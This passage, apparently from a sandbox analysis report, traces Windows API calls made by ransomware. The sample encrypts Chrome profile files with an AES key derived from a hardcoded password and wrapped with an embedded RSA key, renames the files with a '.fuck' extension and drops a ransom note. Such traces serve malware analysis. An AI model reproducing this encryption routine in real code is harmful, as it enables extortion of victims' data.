lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000003.ldb.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000003.ldb.fuck")) returned 1 [0265.416] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0265.416] CryptDestroyKey (hKey=0x2e7e9c0) returned 1 [0265.416] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.416] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.417] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0265.417] GetLastError () returned 0x0 [0265.417] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000004.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000004.log")) returned 0x20 [0265.417] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000004.log", dwFileAttributes=0x80) returned 1 [0265.418] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000004.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000004.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0265.419] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000004.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000004.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0265.420] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000004.log.gsg", dwFileAttributes=0x2) returned 1 [0265.420] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2e7a500) returned 1 [0265.422] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0265.422] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0265.422] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.422] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e7e9c0) returned 1 [0265.422] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.422] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0265.422] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2e77200) returned 1 [0265.422] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77200, dwCertEncodingType=0x1, pInfo=0x2eb0b60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0b90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0b98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e7ea00) returned 1 [0265.422] CryptEncrypt (in: hKey=0x2e7ea00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0265.422] CryptEncrypt (in: hKey=0x2e7ea00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76cb0*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2e76cb0*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0265.422] WriteFile (in: hFile=0x5d40, lpBuffer=0x2e76cb0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2e76cb0*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0265.423] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.445] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.445] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.447] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.447] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.447] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.447] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.447] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.447] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.448] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x88, lpOverlapped=0x0) returned 1 [0265.448] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x88, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x90) returned 1 [0265.448] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x90, lpOverlapped=0x0) returned 1 [0265.448] CloseHandle (hObject=0x5d4c) returned 1 [0265.448] CloseHandle (hObject=0x5d40) returned 1 [0265.448] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000004.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000004.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000004.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000004.log"), bFailIfExists=0) returned 1 [0265.452] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000004.log", dwFileAttributes=0x0) returned 1 [0265.452] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000004.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000004.log.gsg")) returned 1 [0265.454] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000004.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000004.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000004.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000004.log.fuck")) returned 1 [0265.457] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0265.457] CryptDestroyKey (hKey=0x2e7e9c0) returned 1 [0265.457] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.457] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.457] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.457] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.457] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.458] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0265.458] GetLastError () returned 0x0 [0265.458] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\log.old")) returned 0x20 [0265.458] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\LOG.old", dwFileAttributes=0x80) returned 1 [0265.459] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\log.old"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0265.459] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\log.old.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0265.461] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\LOG.old.gsg", dwFileAttributes=0x2) returned 1 [0265.461] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2e7a500) returned 1 [0265.464] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0265.464] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0265.464] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.464] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e7e9c0) returned 1 [0265.464] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.464] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0265.464] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2e76fe0) returned 1 [0265.465] CryptImportPublicKeyInfo (in: hCryptProv=0x2e76fe0, dwCertEncodingType=0x1, pInfo=0x2eb01a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb01d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb01d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e7ee00) returned 1 [0265.465] CryptEncrypt (in: hKey=0x2e7ee00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0265.465] CryptEncrypt (in: hKey=0x2e7ee00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e77288*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2e77288*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0265.465] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2e77288*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2e77288*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0265.466] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x24e, lpOverlapped=0x0) returned 1 [0265.469] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x24e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x250) returned 1 [0265.469] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x250, lpOverlapped=0x0) returned 1 [0265.471] CloseHandle (hObject=0x5d40) returned 1 [0265.471] CloseHandle (hObject=0x5d4c) returned 1 [0265.471] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\log.old.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\log.old"), bFailIfExists=0) returned 1 [0265.479] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\LOG.old", dwFileAttributes=0x0) returned 1 [0265.479] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\log.old.gsg")) returned 1 [0265.481] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\log.old"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\LOG.old.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\log.old.fuck")) returned 1 [0265.484] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0265.485] CryptDestroyKey (hKey=0x2e7e9c0) returned 1 [0265.485] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.485] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.485] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0265.485] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.485] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\readme_back_files.htm")) returned 0xffffffff [0265.485] AreFileApisANSI () returned 1 [0265.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0265.485] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0265.486] GetFileType (hFile=0x5d48) returned 0x1 [0265.486] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0265.487] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.487] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.487] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.487] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7fb00 [0265.488] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.488] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.488] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fbc0 [0265.489] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.489] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.490] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.490] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.490] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.490] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.490] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d72c | out: lpSystemTimeAsFileTime=0x2b9d72c) [0265.490] GetLastError () returned 0x0 [0265.490] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.old")) returned 0x20 [0265.491] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.old", dwFileAttributes=0x80) returned 1 [0265.491] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.old"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0265.492] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.old.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0265.494] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.old.gsg", dwFileAttributes=0x2) returned 1 [0265.494] CryptAcquireContextA (in: phProv=0x2b9c728, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c728*=0x2e77068) returned 1 [0265.496] CryptCreateHash (in: hProv=0x2e77068, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c72c | out: phHash=0x2b9c72c) returned 1 [0265.496] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0265.496] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.496] CryptDeriveKey (in: hProv=0x2e77068, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c718 | out: phKey=0x2b9c718*=0x2e7eb40) returned 1 [0265.497] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----p", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.497] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c734, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710 | out: pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710) returned 1 [0265.497] CryptAcquireContextA (in: phProv=0x2b9c724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c724*=0x2e770f0) returned 1 [0265.497] CryptImportPublicKeyInfo (in: hCryptProv=0x2e770f0, dwCertEncodingType=0x1, pInfo=0x2eb1380*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb13b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb13b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c71c | out: phKey=0x2b9c71c*=0x2e7ea40) returned 1 [0265.497] CryptEncrypt (in: hKey=0x2e7ea40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c70c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, 